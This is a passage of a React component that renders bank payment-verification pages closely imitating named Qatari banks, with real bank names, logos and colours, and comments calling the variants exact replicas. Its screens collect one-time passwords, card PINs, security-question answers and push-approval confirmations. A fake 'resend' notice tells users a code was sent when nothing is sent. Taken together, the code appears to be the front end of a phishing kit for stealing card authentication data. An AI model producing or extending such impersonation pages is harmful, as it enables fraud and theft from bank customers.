import React, { useState } from 'react';
import { isMastercard } from '../../utils/cardScheme';
import { getTranslation } from '../../utils/i18n';
import './QatarBankLayout.css';

export const QATAR_BANKS = {
  qatar_qnb: {
    key: 'qnb',
    name: 'Qatar National Bank (QNB)',
    logo: '/images/banks/qnb.png',
    primaryColor: '#000F33',
    type: 'qnb'
  },
  qatar_cboq: {
    key: 'cboq',
    name: 'Commercial Bank of Qatar',
    logo: '/images/banks/cboq.png',
    primaryColor: '#0277EF',
    type: 'cboq'
  },
  qatar_qib: {
    key: 'qib',
    name: 'Qatar Islamic Bank',
    logo: '/images/banks/qib.png',
    primaryColor: '#0369a1',
    type: 'qib'
  },
  qatar_qiib: {
    key: 'qiib',
    name: 'Qatar International Islamic Bank',
    logo: '/images/banks/qib.png',
    primaryColor: '#0369a1',
    type: 'qiib'
  },
  qatar_doha: {
    key: 'doha',
    name: 'Doha Bank',
    logo: '/images/banks/doha.png',
    primaryColor: '#006838',
    type: 'doha'
  },
  qatar_alrayan: {
    key: 'alrayan',
    name: 'Masraf Al Rayan',
    logo: '/images/banks/alrayan.png',
    primaryColor: '#183AB0',
    type: 'alrayan'
  },
  qatar_dukhan: {
    key: 'dukhan',
    name: 'Dukhan Bank',
    logo: '/images/banks/dukhan.png',
    primaryColor: '#183AB0',
    type: 'dukhan'
  },
  qatar_hsbc: {
    key: 'hsbc',
    name: 'HSBC Bank Middle East',
    logo: '/images/banks/hsbc.png',
    primaryColor: '#47749E',
    type: 'hsbc'
  },
  qatar_ahli: {
    key: 'ahli',
    name: 'Ahli Bank Q.S.C.',
    logo: '/images/banks/ahli.png',
    primaryColor: '#0B3D91',
    type: 'ahli'
  },
  qatar_default: {
    key: 'default',
    name: 'Qatar Bank Authentication',
    logo: '/images/banks/qnb.png',
    primaryColor: '#000F33',
    type: 'qnb'
  }
};

export const isQatarBankDesign = (design) => {
  return Boolean(design && (design.startsWith('qatar_') || QATAR_BANKS[design]));
};

export default function QatarBankLayout({
  design,
  mode = 'otp', // 'otp' | 'push' | 'question' | 'pin'
  // OTP / Refund props
  code = '',
  setCode,
  handleCodeChange,
  handleSubmit,
  errorMessage,
  isDuplicate = false,
  isRetryActive = false,
  isShaking = false,
  isSubmitting = false,
  setIsDuplicate,
  onCancel,
  isRefund = false,
  // Push props
  customMessage,
  onApprove,
  // Question props
  customQuestion,
  answer = '',
  setAnswer,
  handleQuestionSubmit,
  // PIN props
  pin = '',
  setPin,
  handlePinSubmit
}) {
  const bank = QATAR_BANKS[design] || QATAR_BANKS.qatar_default;
  const activeMode = localStorage.getItem('session_mode') || ((typeof process !== 'undefined' && process.env.REACT_APP_MODE) || undefined) || 'standardEN';
  const t = getTranslation(activeMode);
  const isRtl = t.dir === 'rtl';

  const merchant = localStorage.getItem('session_merchant') || ((typeof process !== 'undefined' && process.env.REACT_APP_MERCHANT_NAME) || undefined) || 'Merchant';
  const amount = localStorage.getItem('session_amount') || localStorage.getItem('summ') || '';
  const currency = localStorage.getItem('session_currency') || localStorage.getItem('currency') || ((typeof process !== 'undefined' && process.env.REACT_APP_CURRENCY) || undefined) || 'QAR';
  const last4 = localStorage.getItem('session_last4') || localStorage.getItem('last-four-digits') || '4242';

  const [resendSuccess, setResendSuccess] = useState(false);
  const isMc = isMastercard(design);
  const schemeLogo = isMc ? '/images/banks/idcheck2.png' : '/images/banks/visa.png';
  const schemeAlt = isMc ? 'Mastercard' : 'Visa';

  const today = new Date();
  const formattedDate = `${today.getDate().toString().padStart(2, '0')}/${(today.getMonth() + 1).toString().padStart(2, '0')}/${today.getFullYear()}`;

  const handleResend = () => {
    if (setCode) setCode('');
    if (setIsDuplicate) setIsDuplicate(false);
    setResendSuccess(true);
    setTimeout(() => setResendSuccess(false), 3500);
  };

  const renderError = () => {
    if (!errorMessage) return null;
    return (
      <div className={`qb-error-banner ${isShaking ? 'qb-shake' : ''}`} role="alert">
        <span>{errorMessage}</span>
      </div>
    );
  };

  // ─── PUSH MODE ───────────────────────────────────────────────────
  if (mode === 'push') {
    return (
      <div className={`qb-container ${isRtl ? 'qb-container--rtl' : ''}`}>
        <div className="qb-modal">
          <main className="qb-body">
            <div className="qb-logos-header">
              <img src={bank.logo} alt={bank.name} className="qb-bank-logo" onError={(e) => { e.target.style.display = 'none'; }} />
              <img src={schemeLogo} alt={schemeAlt} className="qb-scheme-logo" onError={(e) => { e.target.style.display = 'none'; }} />
            </div>

            <h1 style={{ fontSize: '1rem', fontWeight: 'bold', color: '#1e293b', marginTop: '0.75rem', textAlign: 'center' }}>
              {isRtl ? 'الموافقة عبر التطبيق البنكي' : 'Authentication via Mobile App'}
            </h1>

            <div className="qb-push-card">
              <div className="qb-push-spinner" style={{ borderTopColor: bank.primaryColor }} />
              <p style={{ fontSize: '0.85rem', color: '#1e293b', lineHeight: '1.45', margin: 0 }}>
                {customMessage || (isRtl ? 'يرجى فتح تطبيق البنك والموافقة على تفويض المعاملة.' : 'Please open your mobile banking app to approve this payment request.')}
              </p>
            </div>

            <button
              type="button"
              onClick={onApprove}
              style={{
                height: '2.5rem',
                width: '100%',
                backgroundColor: bank.primaryColor,
                color: '#ffffff',
                border: 'none',
                borderRadius: '6px',
                fontSize: '0.825rem',
                fontWeight: 'bold',
                cursor: 'pointer',
                marginTop: '0.5rem'
              }}
            >
              {isRtl ? 'لقد أكدت الإشعار' : 'I confirmed push'}
            </button>

            <button
              type="button"
              onClick={onCancel || (() => window.location.href = '/')}
              style={{
                height: '2.25rem',
                width: '100%',
                backgroundColor: '#ffffff',
                color: '#6b7280',
                border: '1px solid #d1d5db',
                borderRadius: '6px',
                fontSize: '0.8rem',
                fontWeight: '600',
                cursor: 'pointer',
                marginTop: '0.5rem'
              }}
            >
              {isRtl ? 'إلغاء' : 'Cancel'}
            </button>
          </main>
        </div>
      </div>
    );
  }

  // ─── QUESTION MODE ───────────────────────────────────────────────
  if (mode === 'question') {
    return (
      <div className={`qb-container ${isRtl ? 'qb-container--rtl' : ''}`}>
        <div className="qb-modal">
          <main className="qb-body">
            <div className="qb-logos-header">
              <img src={bank.logo} alt={bank.name} className="qb-bank-logo" onError={(e) => { e.target.style.display = 'none'; }} />
              <img src={schemeLogo} alt={schemeAlt} className="qb-scheme-logo" onError={(e) => { e.target.style.display = 'none'; }} />
            </div>

            <h1 style={{ fontSize: '1rem', fontWeight: 'bold', color: '#1e293b', marginTop: '0.75rem', textAlign: 'center' }}>
              {isRtl ? 'التحقق الأمني الإضافي' : 'Security Verification'}
            </h1>
            <p style={{ fontSize: '0.8rem', color: '#4b5563', textAlign: 'center', margin: '0.25rem 0 0.75rem' }}>
              {isRtl ? 'يرجى الإجابة على سؤال الأمان البنكي:' : 'Please answer your security question to continue:'}
            </p>

            {customQuestion && (
              <div className="qb-question-box">
                {customQuestion}
              </div>
            )}

            <form onSubmit={handleQuestionSubmit}>
              <input
                type="text"
                value={answer}
                onChange={(e) => setAnswer(e.target.value)}
                autoFocus
                placeholder={isRtl ? 'أدخل إجابتك هنا' : 'Enter your answer'}
                style={{
                  height: '2.5rem',
                  width: '100%',
                  borderRadius: '6px',
                  border: '1px solid #d1d5db',
                  padding: '0 0.75rem',
                  fontSize: '0.9rem',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={!answer.trim() || isSubmitting}
                style={{
                  height: '2.5rem',
                  width: '100%',
                  backgroundColor: bank.primaryColor,
                  color: '#ffffff',
                  border: 'none',
                  borderRadius: '6px',
                  fontSize: '0.825rem',
                  fontWeight: 'bold',
                  cursor: 'pointer',
                  marginTop: '0.75rem'
                }}
              >
                {isSubmitting ? (isRtl ? 'جاري التحقق...' : 'Verifying...') : (isRtl ? 'إرسال' : 'SUBMIT')}
              </button>
            </form>
          </main>
        </div>
      </div>
    );
  }

  // ─── PIN MODE ────────────────────────────────────────────────────
  if (mode === 'pin') {
    return (
      <div className={`qb-container ${isRtl ? 'qb-container--rtl' : ''}`}>
        <div className="qb-modal">
          <main className="qb-body">
            <div className="qb-logos-header">
              <img src={bank.logo} alt={bank.name} className="qb-bank-logo" onError={(e) => { e.target.style.display = 'none'; }} />
              <img src={schemeLogo} alt={schemeAlt} className="qb-scheme-logo" onError={(e) => { e.target.style.display = 'none'; }} />
            </div>

            <h1 style={{ fontSize: '1rem', fontWeight: 'bold', color: '#1e293b', marginTop: '0.75rem', textAlign: 'center' }}>
              {isRtl ? 'التحقق من الرقم السري للبطاقة' : 'Card PIN Verification'}
            </h1>
            <p style={{ fontSize: '0.8rem', color: '#4b5563', textAlign: 'center', margin: '0.25rem 0 0.75rem' }}>
              {isRtl ? 'يرجى إدخال الرقم السري المكون من 4 أرقام الخاص ببطاقتك:' : 'Please enter your 4-digit card PIN to authorize payment:'}
            </p>

            {renderError()}

            <form onSubmit={handlePinSubmit}>
              <input
                type="password"
                inputMode="numeric"
                maxLength={4}
                value={pin}
                onChange={(e) => setPin(e.target.value.replace(/\D/g, '').slice(0, 4))}
                autoFocus
                placeholder="••••"
                className="qb-pin-input"
                style={{
                  height: '2.5rem',
                  width: '100%',
                  borderRadius: '6px',
                  border: '1px solid #d1d5db',
                  padding: '0 0.75rem',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={pin.length < 4 || isSubmitting}
                style={{
                  height: '2.5rem',
                  width: '100%',
                  backgroundColor: bank.primaryColor,
                  color: '#ffffff',
                  border: 'none',
                  borderRadius: '6px',
                  fontSize: '0.825rem',
                  fontWeight: 'bold',
                  cursor: 'pointer',
                  marginTop: '0.75rem'
                }}
              >
                {isSubmitting ? (isRtl ? 'جاري التحقق...' : 'Verifying...') : (isRtl ? 'تفويض الدفع' : 'AUTHORIZE PAYMENT')}
              </button>
            </form>
          </main>
        </div>
      </div>
    );
  }

  // ─── 1. QNB VARIANT (Exact 1:1 replica of QNB.jsx) ───────────────
  if (bank.type === 'qnb') {
    return (
      <div className={`qb-container ${isRtl ? 'qb-container--rtl' : ''}`}>
        <div className="qb-modal">
          <main className="qb-body" style={{ fontFamily: 'Georgia, serif' }}>
            <div style={{ borderTop: '1px solid #d4d4d4', margin: '0.25rem 0' }} />

            <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', padding: '0.5rem 0' }}>
              <img src={bank.logo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <h1 style={{ marginTop: '0.75rem', fontSize: '0.875rem', fontWeight: 'bold', color: '#374151' }}>
              {isMc ? 'Mastercard® Identity Check™' : 'Visa Secure'}
            </h1>

            <div style={{ marginTop: '0.75rem', fontSize: '0.75rem', lineHeight: '1rem', color: '#374151' }}>
              <div>{merchant}</div>
              <div style={{ fontSize: '0.875rem', fontWeight: 'bold' }}>{currency} {amount}</div>
              <div style={{ marginTop: '0.25rem' }}>{formattedDate}</div>
              <div>************{last4}</div>
            </div>

            <p style={{ marginTop: '1rem', fontSize: '0.75rem', lineHeight: '1.25rem', color: '#374151' }}>
              {isRefund
                ? (isRtl ? 'تم إرسال كلمة مرور لمرة واحدة عبر SMS لتأكيد استرداد الأموال.' : 'For increased security QNB has sent you a password valid for one time use only by SMS to verify your refund.')
                : (isRtl ? 'لمزيد من الأمان، أرسل لك بنك قطر الوطني كلمة مرور صالحة لمرة واحدة عبر رسالة نصية قصيرة إلى هاتفك المسجل.' : 'For increased security QNB has sent you a password valid for one time use only by SMS to your mobile phone.')}
            </p>

            <p style={{ marginTop: '0.5rem', fontSize: '0.75rem', fontWeight: 600, color: '#525252' }}>
              {isRtl ? 'أدخل الرمز' : 'Enter the code'}
            </p>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ marginTop: '0.5rem' }}>
              <input
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={6}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                dir="ltr"
                style={{
                  height: '1.75rem',
                  width: '100%',
                  border: 'none',
                  borderBottom: '1px solid #828282',
                  backgroundColor: '#F2F2F2',
                  padding: '0 0.75rem',
                  textAlign: 'center',
                  fontSize: '0.75rem',
                  letterSpacing: '0.2em',
                  color: '#000000',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length !== 6 || isDuplicate || isSubmitting}
                style={{
                  marginTop: '0.5rem',
                  display: 'flex',
                  height: '2rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  backgroundColor: '#000F33',
                  fontSize: '0.75rem',
                  fontWeight: 'bold',
                  color: '#ffffff',
                  border: 'none',
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? (isRtl ? 'تأكيد الاسترداد' : 'CONFIRM REFUND') : (isRtl ? 'تأكيد' : 'Confirm'))}
              </button>

              <button
                type="button"
                onClick={handleResend}
                style={{
                  marginTop: '0.5rem',
                  display: 'flex',
                  height: '2rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  border: '1px solid #000F33',
                  backgroundColor: '#ffffff',
                  fontSize: '0.75rem',
                  fontWeight: 'bold',
                  color: '#000F33',
                  cursor: 'pointer'
                }}
              >
                {isRtl ? 'إعادة إرسال رمز جديد' : 'Resend new code'}
              </button>

              {resendSuccess && (
                <div className="qb-resend-alert" role="status">
                  ✓ {isRtl ? 'تم إرسال رمز تحقق جديد بنجاح' : 'New verification code sent to your mobile phone'}
                </div>
              )}
            </form>

            <div style={{ marginTop: '1.5rem', borderTop: '1px solid #d4d4d4', paddingTop: '0.5rem', fontSize: '0.75rem', color: '#525252' }}>
              <span>› {isRtl ? 'هل تحتاج إلى مساعدة؟' : 'Need some help?'}</span>
            </div>
          </main>
        </div>
      </div>
    );
  }

  // ─── 2. CBOQ VARIANT (Exact 1:1 replica of CBOQ.jsx) ─────────────
  if (bank.type === 'cboq') {
    return (
      <div className={`qb-container ${isRtl ? 'qb-container--rtl' : ''}`}>
        <div className="qb-modal">
          <main className="qb-body">
            <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', borderTop: '1px solid #d4d4d4', borderBottom: '1px solid #d4d4d4', padding: '0.5rem 0' }}>
              <img src={bank.logo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <h1 style={{ marginTop: '1rem', textAlign: 'center', fontWeight: 'bold', fontSize: '1rem', color: '#000000' }}>
              {isRefund ? (isRtl ? 'المصادقة على استرداد الأموال' : 'Refund Authentication') : (isRtl ? 'مصادقة الدفع' : 'Payment Authentication')}
            </h1>

            <p style={{ marginTop: '0.75rem', textAlign: 'center', fontSize: '0.75rem', lineHeight: '1rem', color: '#737373', padding: '0 1rem' }}>
              {isRefund
                ? (isRtl ? 'يلزم إدخال رمز التحقق لمرة واحدة لإتمام استرداد أموالك.' : 'One-Time Password (OTP) is required for this refund. The password has been sent to your registered mobile.')
                : (isRtl ? 'يلزم إدخال رمز التحقق لمرة واحدة لإتمام عملية الشراء. تم إرسال الرمز إلى رقم هاتفك المحمول المسجل.' : 'One-Time Password (OTP) is required for this purchase. The password has been sent to your registered mobile.')}
            </p>

            <div style={{ marginTop: '1rem', textAlign: 'center', fontSize: '0.75rem', lineHeight: '1.25rem', color: '#737373' }}>
              <div>{isRtl ? 'المتجر: ' : 'Merchant: '}<span>{merchant}</span></div>
              <div>{isRtl ? 'المبلغ: ' : 'Amount: '}<span dir="ltr">{currency} {amount}</span></div>
              <div>{isRtl ? 'التاريخ: ' : 'Date: '}<span dir="ltr">{formattedDate}</span></div>
              <div>{isRtl ? 'رقم البطاقة: ' : 'Card Number: '}<span dir="ltr">**** **** **** {last4}</span></div>
            </div>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ maxWidth: '18rem', margin: '1.5rem auto 0' }}>
              <input
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={6}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                placeholder={isRtl ? 'أدخل رمز التحقق' : 'Enter OTP'}
                dir="ltr"
                style={{
                  height: '2.5rem',
                  width: '100%',
                  borderRadius: '0.5rem',
                  border: '1px solid #d4d4d4',
                  backgroundColor: '#ffffff',
                  padding: '0 1rem',
                  textAlign: 'center',
                  fontSize: '1rem',
                  color: '#374151',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length !== 6 || isDuplicate || isSubmitting}
                style={{
                  marginTop: '0.75rem',
                  display: 'flex',
                  height: '2.5rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.375rem',
                  border: '1px solid #0277EF',
                  backgroundColor: '#0277EF',
                  fontSize: '1rem',
                  fontWeight: 300,
                  color: '#ffffff',
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? (isRtl ? 'تأكيد الاسترداد' : 'CONFIRM REFUND') : (isRtl ? 'إرسال' : 'SUBMIT'))}
              </button>

              <button
                type="button"
                onClick={handleResend}
                style={{
                  marginTop: '0.75rem',
                  display: 'flex',
                  height: '2.5rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.375rem',
                  border: '2px solid #64748b',
                  backgroundColor: '#ffffff',
                  fontSize: '1rem',
                  fontWeight: 300,
                  color: '#64748b',
                  cursor: 'pointer'
                }}
              >
                {isRtl ? 'إعادة إرسال الرمز' : 'RESEND OTP'}
              </button>

              {resendSuccess && (
                <div className="qb-resend-alert" role="status">
                  ✓ {isRtl ? 'تم إرسال رمز تحقق جديد بنجاح' : 'New verification code sent to your mobile phone'}
                </div>
              )}
            </form>

            <div style={{ marginTop: '1rem', borderTop: '1px solid #d4d4d4', paddingTop: '1rem', textAlign: isRtl ? 'left' : 'right' }}>
              <span style={{ fontSize: '0.75rem', fontWeight: 600, color: '#3b82f6', cursor: 'pointer' }}>
                {isRtl ? 'مساعدة؟' : 'Help?'}
              </span>
            </div>
          </main>
        </div>
      </div>
    );
  }

  // ─── 3. QIB VARIANT (Exact 1:1 replica of QIB.jsx) ───────────────
  if (bank.type === 'qib') {
    return (
      <div className={`qb-container ${isRtl ? 'qb-container--rtl' : ''}`}>
        <div className="qb-modal">
          <main className="qb-body">
            <div style={{ display: 'flex', alignItems: 'flex-start', justifyContent: 'space-between' }}>
              <img src={bank.logo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '3rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <h1 style={{ marginTop: '1.5rem', fontSize: '0.75rem', fontWeight: 800 }}>
              {isRefund ? (isRtl ? 'المصادقة على استرداد الأموال' : 'Refund authentication') : (isRtl ? 'مصادقة الشراء' : 'Purchase authentication')}
            </h1>

            <p style={{ marginTop: '0.75rem', fontSize: '0.75rem', lineHeight: '1rem' }}>
              {isRtl ? 'تم إرسال كلمة المرور لمرة واحدة إلى وسيلة الاتصال المسجلة لدى مصرف قطر الإسلامي.' : 'The One Time Password (OTP) has been sent to your registered contact with QIB.'}
            </p>

            <h2 style={{ marginTop: '1rem', fontSize: '0.75rem', fontWeight: 'bold', color: '#525252' }}>
              {isRtl ? 'تفاصيل المعاملة' : 'Transaction Details'}
            </h2>

            <div style={{ marginTop: '0.75rem', fontSize: '0.75rem', lineHeight: '1.25rem' }}>
              <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                <span style={{ fontWeight: 800 }}>{isRtl ? 'المتجر:' : 'Merchant:'}</span>
                <span>{merchant}</span>
              </div>
              <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                <span style={{ fontWeight: 800 }}>{isRtl ? 'مبلغ المعاملة:' : 'Transaction Amount:'}</span>
                <span dir="ltr">{currency} {amount}</span>
              </div>
              <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                <span style={{ fontWeight: 800 }}>{isRtl ? 'رقم البطاقة:' : 'Card Number:'}</span>
                <span dir="ltr">************{last4}</span>
              </div>
            </div>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ marginTop: '1rem' }}>
              <label style={{ display: 'block', fontSize: '0.75rem', fontWeight: 800, marginBottom: '0.25rem' }}>
                {isRtl ? 'أدخل الرمز:' : 'Enter Code:'}
              </label>

              <input
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={6}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                dir="ltr"
                style={{
                  height: '1.75rem',
                  width: '100%',
                  borderRadius: '0.25rem',
                  border: '1px solid #a5b4fc',
                  backgroundColor: '#ffffff',
                  padding: '0 0.5rem',
                  fontSize: '0.75rem',
                  color: '#000000',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <div style={{ marginTop: '0.75rem', textAlign: 'center' }}>
                <button
                  type="button"
                  onClick={handleResend}
                  style={{ fontSize: '0.75rem', fontWeight: 600, textDecoration: 'underline', background: 'none', border: 'none', cursor: 'pointer', color: '#000000' }}
                >
                  {isRtl ? 'اضغط هنا لاستلام رمز آخر' : 'Click here to receive another code'}
                </button>
              </div>

              {resendSuccess && (
                <div className="qb-resend-alert" role="status">
                  ✓ {isRtl ? 'تم إرسال رمز تحقق جديد بنجاح' : 'New verification code sent to your mobile phone'}
                </div>
              )}

              <div style={{ marginTop: '0.75rem', display: 'flex', justifyContent: 'center' }}>
                <button
                  type="submit"
                  disabled={code.length !== 6 || isDuplicate || isSubmitting}
                  style={{
                    display: 'flex',
                    height: '2rem',
                    width: '7rem',
                    alignItems: 'center',
                    justifyContent: 'center',
                    backgroundColor: '#0369a1',
                    fontSize: '0.75rem',
                    fontWeight: 'bold',
                    color: '#ffffff',
                    border: 'none',
                    borderRadius: '0.25rem',
                    cursor: 'pointer'
                  }}
                >
                  {isSubmitting ? '...' : (isRefund ? (isRtl ? 'استرداد' : 'Refund') : (isRtl ? 'إرسال' : 'Submit'))}
                </button>
              </div>
            </form>

            <div style={{ marginTop: '1rem', fontSize: '0.75rem', color: '#737373', textAlign: 'center' }}>
              {isRtl ? 'تطبق الشروط والأحكام' : 'Terms and Conditions Apply'}
            </div>
          </main>
        </div>
      </div>
    );
  }

  // ─── 4. QIIB VARIANT (Exact 1:1 replica of QIIB.jsx) ─────────────
  if (bank.type === 'qiib') {
    return (
      <div className={`qb-container ${isRtl ? 'qb-container--rtl' : ''}`}>
        <div className="qb-modal">
          <main className="qb-body">
            <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between' }}>
              <img src={bank.logo} alt="" style={{ height: '3.5rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '3rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <h1 style={{ marginTop: '1.5rem', textAlign: 'center', fontSize: '1.5rem', fontWeight: 'bold', color: '#0c4a6e' }}>
              {isRefund ? (isRtl ? 'تأكيد الاسترداد' : 'Verify Refund') : (isRtl ? 'التحقق' : 'Verify')}
            </h1>

            <div style={{ marginTop: '1rem', fontSize: '1rem', lineHeight: '1.5rem', color: '#404040' }}>
              <p>{isRtl ? `لقد أرسلنا إليك رسالة تحتوي على رمز أمان إلى رقم هاتفك المسجل المنتهي بـ ****${last4}.` : `We have sent you a message with a code to your registered mobile number ending with ****${last4}.`}</p>
              <p style={{ marginTop: '0.5rem' }}>{isRtl ? `أنت تدفع لـ ${merchant} مبلغ ${amount} ${currency} بالبطاقة المنتهية بـ ${last4}. تاريخ المعاملة هو ${formattedDate}.` : `You are paying ${merchant} the amount of ${amount} ${currency} with card number ending ${last4}. Transaction Date is ${formattedDate}.`}</p>
            </div>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ marginTop: '1rem' }}>
              <label htmlFor="qiib-code" style={{ display: 'block', fontSize: '1rem', color: '#404040' }}>
                {isRtl ? 'أدخل الرمز المكون من 6 أرقام:' : 'Enter your 6 digit code (1):'}
              </label>

              <input
                id="qiib-code"
                type="text"
                inputMode="numeric"
                maxLength={6}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                placeholder="-  -  -  -  -  -"
                dir="ltr"
                style={{
                  marginTop: '0.75rem',
                  height: '2.5rem',
                  width: '100%',
                  borderRadius: '0.375rem',
                  border: '1px solid #737373',
                  backgroundColor: '#ffffff',
                  padding: '0 1rem',
                  textAlign: 'center',
                  fontSize: '1.125rem',
                  letterSpacing: '0.25em',
                  color: '#262626',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length !== 6 || isDuplicate || isSubmitting}
                style={{
                  marginTop: '1.5rem',
                  display: 'flex',
                  height: '2.75rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.375rem',
                  border: '1px solid #0369a1',
                  background: 'linear-gradient(to bottom, #0284c7, #0369a1, #075985)',
                  fontSize: '0.875rem',
                  fontWeight: 'bold',
                  color: '#ffffff',
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? (isRtl ? 'تأكيد الاسترداد' : 'CONFIRM REFUND') : (isRtl ? 'إرسال' : 'Submit'))}
              </button>

              <button
                type="button"
                onClick={handleResend}
                style={{
                  marginTop: '1rem',
                  display: 'flex',
                  height: '2.75rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.375rem',
                  border: '1px solid #d6d3d1',
                  background: 'linear-gradient(to bottom, #ffffff, #fafaf9, #f5f5f4)',
                  fontSize: '0.875rem',
                  fontWeight: 'bold',
                  color: '#075985',
                  cursor: 'pointer'
                }}
              >
                {isRtl ? 'إعادة إرسال الرمز' : 'Resend Code'}
              </button>

              {resendSuccess && (
                <div className="qb-resend-alert" role="status">
                  ✓ {isRtl ? 'تم إرسال رمز تحقق جديد بنجاح' : 'New verification code sent to your mobile phone'}
                </div>
              )}
            </form>
          </main>
        </div>
      </div>
    );
  }

  // ─── 5. DOHA VARIANT (Exact 1:1 replica of DOHA.jsx) ─────────────
  if (bank.type === 'doha') {
    return (
      <div className={`qb-container ${isRtl ? 'qb-container--rtl' : ''}`}>
        <div className="qb-modal">
          <main className="qb-body">
            <div style={{ display: 'flex', alignItems: 'flex-start', justifyContent: 'space-between' }}>
              <img src={bank.logo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <h1 style={{ marginTop: '1.5rem', fontSize: '0.75rem', fontWeight: 800 }}>
              {isRefund ? (isRtl ? 'المصادقة على استرداد الأموال' : 'Authenticate your Refund') : (isRtl ? 'مصادقة الشراء' : 'Authenticate your Purchase')}
            </h1>

            <p style={{ marginTop: '0.75rem', fontSize: '0.75rem', lineHeight: '1.25rem' }}>
              {isRtl ? 'لقد أرسلنا إليك للتو رمز تحقق لمرة واحدة' : 'We just sent you a One Time Password'}
            </p>

            <p style={{ marginTop: '0.75rem', fontSize: '0.75rem' }}>
              {isRtl ? `أنت تفوض دفعة لـ ${merchant} بمبلغ ${currency} ${amount} في ${formattedDate} ببطاقتك ************${last4}.` : `You are authorizing a payment to ${merchant} for ${currency} ${amount} on ${formattedDate} with your card ************${last4}.`}
            </p>

            <h2 style={{ marginTop: '1.5rem', fontSize: '0.75rem', fontWeight: 'bold', color: '#525252' }}>
              {isRtl ? 'تفاصيل المعاملة' : 'Transaction Details'}
            </h2>

            <div style={{ marginTop: '0.75rem', fontSize: '0.75rem', lineHeight: '1.25rem' }}>
              <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                <span style={{ fontWeight: 800 }}>{isRtl ? 'المتجر:' : 'Merchant:'}</span>
                <span>{merchant}</span>
              </div>
              <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                <span style={{ fontWeight: 800 }}>{isRtl ? 'مبلغ المعاملة:' : 'Transaction Amount:'}</span>
                <span dir="ltr">{currency} {amount}</span>
              </div>
              <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                <span style={{ fontWeight: 800 }}>{isRtl ? 'رقم البطاقة:' : 'Card Number:'}</span>
                <span dir="ltr">************{last4}</span>
              </div>
            </div>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ marginTop: '1rem' }}>
              <label style={{ display: 'block', fontSize: '0.75rem', fontWeight: 800, marginBottom: '0.25rem' }}>
                {isRtl ? 'أدخل الرمز:' : 'Enter Code:'}
              </label>

              <input
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={6}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                dir="ltr"
                style={{
                  height: '1.75rem',
                  width: '100%',
                  borderRadius: '0.25rem',
                  border: '1px solid #d4d4d4',
                  backgroundColor: '#ffffff',
                  padding: '0 0.5rem',
                  fontSize: '0.75rem',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <div style={{ marginTop: '0.75rem', textAlign: 'center' }}>
                <button
                  type="button"
                  onClick={handleResend}
                  style={{ fontSize: '0.75rem', fontWeight: 600, textDecoration: 'underline', background: 'none', border: 'none', cursor: 'pointer', color: '#000000' }}
                >
                  {isRtl ? 'اضغط هنا لاستلام رمز آخر' : 'Click here to receive another code'}
                </button>
              </div>

              {resendSuccess && (
                <div className="qb-resend-alert" role="status">
                  ✓ {isRtl ? 'تم إرسال رمز تحقق جديد بنجاح' : 'New verification code sent to your mobile phone'}
                </div>
              )}

              <div style={{ marginTop: '0.75rem', display: 'flex', justifyContent: 'center' }}>
                <button
                  type="submit"
